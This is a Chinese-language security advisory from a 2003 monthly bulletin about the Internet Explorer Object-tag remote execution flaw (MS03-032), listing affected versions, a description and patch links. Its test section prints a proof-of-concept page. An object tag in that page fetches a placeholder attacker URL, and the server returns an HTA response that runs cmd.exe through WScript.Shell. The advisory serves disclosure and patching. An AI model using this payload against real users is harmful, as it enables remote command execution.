首页 -> 安全研究

安全研究

绿盟月刊
绿盟安全月刊->第44期->最新漏洞
期刊号: 类型: 关键词:
Internet Explorer Object数据远程执行漏洞

日期:2003-09-03

发布日期:2003-08-20
更新日期:2003-08-25

受影响系统:
Microsoft Internet Explorer 6.0
Microsoft Internet Explorer 5.5SP2
Microsoft Internet Explorer 5.5SP1
Microsoft Internet Explorer 5.5
Microsoft Internet Explorer 5.01
Microsoft Internet Explorer 5.0.1SP3
Microsoft Internet Explorer 5.0.1SP2
Microsoft Internet Explorer 5.0.1SP1
Microsoft Internet Explorer 6.0SP1
    - Microsoft Windows XP
    - Microsoft Windows NT 4.0
    - Microsoft Windows ME
    - Microsoft Windows 98 SE
    - Microsoft Windows 98
    - Microsoft Windows 95
    - Microsoft Windows 2003 Web Edition
    - Microsoft Windows 2003 Standard Edition
    - Microsoft Windows 2003 Enterprise Edition 64-bit
    - Microsoft Windows 2003 Enterprise Edition
    - Microsoft Windows 2003 Datacenter Edition 64-bit
    - Microsoft Windows 2003 Datacenter Edition
    - Microsoft Windows 2000
描述:
--------------------------------------------------------------------------------
CVE(CAN) ID: CAN-2002-0532

Microsoft Internet Explorer是一款流行的WEB浏览程序。

Internet Explorer在处理对象标记时没有正确处理要被装载的文件参数,远程攻击者可以利用这个漏洞构建恶意页面,诱使用户访问,使用户IE自动运行嵌入到HTML的任意代码。

"Object"标记用于插入ActiveX组件等对象到HTML页面。"Object"标记的"Type"属性用于设置或获取对象的MIE类型。通常合法MIME类型包括"plain/text"或"application/hta", "audio/x-mpeg"等。指定远程对象数据位置的参数没有充分检查被装载的文件属性,攻击者可以构建恶意页面,诱使用户访问来运行恶意页面指定的程序。

Windows 2003 Internet Explorer由于使用了"Enhanced Security Configuration Mode."模式,默认是使用了"Disable ActiveX",因此此漏洞在Windows 2003 IE级别为中等。

<*来源:Marc Maiffret (marc@eeye.com)
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=106149584928084&w=2
        http://www.microsoft.com/technet/security/bulletin/MS03-032.asp
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Marc Maiffret (marc@eeye.com)提供了如下测试方法:

技术描述:

--------------Client HTTP request---------------------------
<html>
...
<object data="www.yourinternethost.com/yourexploitwebpageorcgi.html">
</object>
</html>
------------------------------------------------------------


-------------Server HTTP Response---------------------------
HTTP/1.1 200 OK
Date: Tue, 13 May 2003 18:06:43 GMT
Server: Apache
Content-Type: application/hta
Content-Length: 191


<html>
<object id='wsh'
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<script>
wsh.Run("cmD.exe /k echO so loNg, and ThaNks For all yoUr EmplOyeeS");
</script>
</html>
------------------------------------------------------------

诱使用户访问上面的恶意页面,就会导致IE用户接收恶意服务器应答,在系统上执行任意命令,构建的页面只要"Data" URL不为不安全扩展名(如".exe", ".bat"等),攻击者可以使用'.hta'或"HTML Application"程序来完成利用这个漏洞。

建议:
--------------------------------------------------------------------------------
厂商补丁:

Microsoft
---------
Microsoft已经为此发布了一个安全公告(MS03-032)以及相应补丁:
MS03-032:Cumulative Patch for Internet Explorer (Q822925)
链接:http://www.microsoft.com/technet/security/bulletin/MS03-032.asp

补丁下载:

All version except Microsoft Internet Explorer 6.0 for Windows Server 2003:

http://www.microsoft.com/windows/ie/downloads/critical/822925/default.asp

Microsoft Internet Explorer 6.0 for Windows Server 2003:

http://www.microsoft.com/windows/ie/downloads/critical/822925s/default.asp
版权所有,未经许可,不得转载